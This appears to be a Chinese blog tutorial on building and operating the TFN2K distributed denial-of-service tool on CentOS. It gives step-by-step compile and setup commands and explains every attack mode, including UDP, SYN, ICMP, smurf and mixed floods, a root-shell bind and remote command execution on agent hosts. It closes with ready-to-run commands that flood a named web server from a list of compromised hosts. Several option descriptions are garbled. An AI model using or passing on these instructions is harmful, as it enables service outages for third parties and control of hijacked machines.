分布式拒绝(DDoS:Distributed Denial of Service)***指借助于客户/服务器技术，将多个计算机联合起来作为***平台，对一个或多个目标发动DoS***，从而成倍地提高拒绝服务***的威力。通常，***者使用一个偷窃帐号将DDoS主控程序安装在一个计算机上，在一个设定的时间主控程序将与大量代理程序，代理程序已经被安装在Internet上的许多计算机上。代理程序收到指令时就发动***。利用客户/器技术，主控程序能在几秒钟内激活成百上千次代理程序的运行

实验环境

centos6.8_x64

实验软件

tfn2k.tgz

配置软件

tar zxvf tfn2k.tgz

cd tfn2k

vim src/ip.h

     127   };         

     127   }; */   修改为

make        

Do you agree to this disclaimer [y/n]? y

./mkpass

server key [8 - 32 chars]:   输入8位密码

cd /root/tfn2k

./tfn                        

-f 这个参数后面跟刚才所写的文本文件名,就是真正实现DDOS***,而不是DOS

-h DOS***,也就是单机,一对一的*** 后面跟一个主机或IP地址

-p 后面指定一个端口,不用说了

-c 最关键的参数,一共有11个选相

0 - 停止***,发善心用的

1 反欺骗等级设定 ,的TFN这个工具在***的时候所发出的数据包是带有源地址的,但是源地址是随机的,也就是说地址不是你自给的

2 改编数据包的包尺寸:缺省的ICMP/8,smurf,udp***缺省使用最小包,你可以通过改变每个包的有效载荷的字节增加它的大小

3 绑定root shell:启动的个会话服务的然后你连接的个指定端口就可以得到的个root shell4 UDP洪水***:这个***是利用这样的个事实:每个udp包被送往的个关闭的端口的这样就会有的个ICMP不可到达的信息返回的增加了***的能力5 SYN洪水***:这个***有规律的送虚假的连接请求,结果会是目标端口拒绝服务的添瞒TCP连接表的通过对不存在主机的TCP/RST响应增加***潜力,是标准的拒绝服务***.6 ICMP响应(ping)***:这个***发送虚假地址的ping请求的目标主机会回送相同大小的响应包7 SMURF***:用目标主机的地址发送ping请求以广播扩大的这样目标主机将得到回复的个多倍的回复8 MIX***:按照1:1:1的关系交替的发送udp,syn,icmp包的这样就可以对付路由器的其它包转发设备的NIDS,sn的fers等,轮番轰炸:)9 TARGA3***10 远程命令执行,这个参数是TFN的附加功能,其实TFN的***不仅仅是DOS,还可以远程的进行明令控制,如:./tfn -f hostext -c 10 -i "mkdir /root/edison" 在所有的HOST上root家目录建立edison,-i后面跟"命令"

./tfn -f hostext -c 4 -i www.xxx.com

hostext文件中记录的主机对163服务器进行UDP***(所有的主机中必需已经起动td进程)./tfn -f hostext -c 5 -i www.xxx.com -p 80

使用hostext文件中记录的主机对163服务器进行TCP拒绝服务***(80***WEB,其他不用说了)

./tfn -f hostext -c 6 -i www.xxx.com

使用hostext文件中记录的主机对163服务器进行ICMP***(PING***,缓冲区溢出马上死机)

./tfn -f hostext -c 8 -i www.xxx.com

使用hostext文件中记录的主机对163服务器进行ICMP&TCP&UDP轮番***

./tfn -f hostext -c 0

让所由主机停止***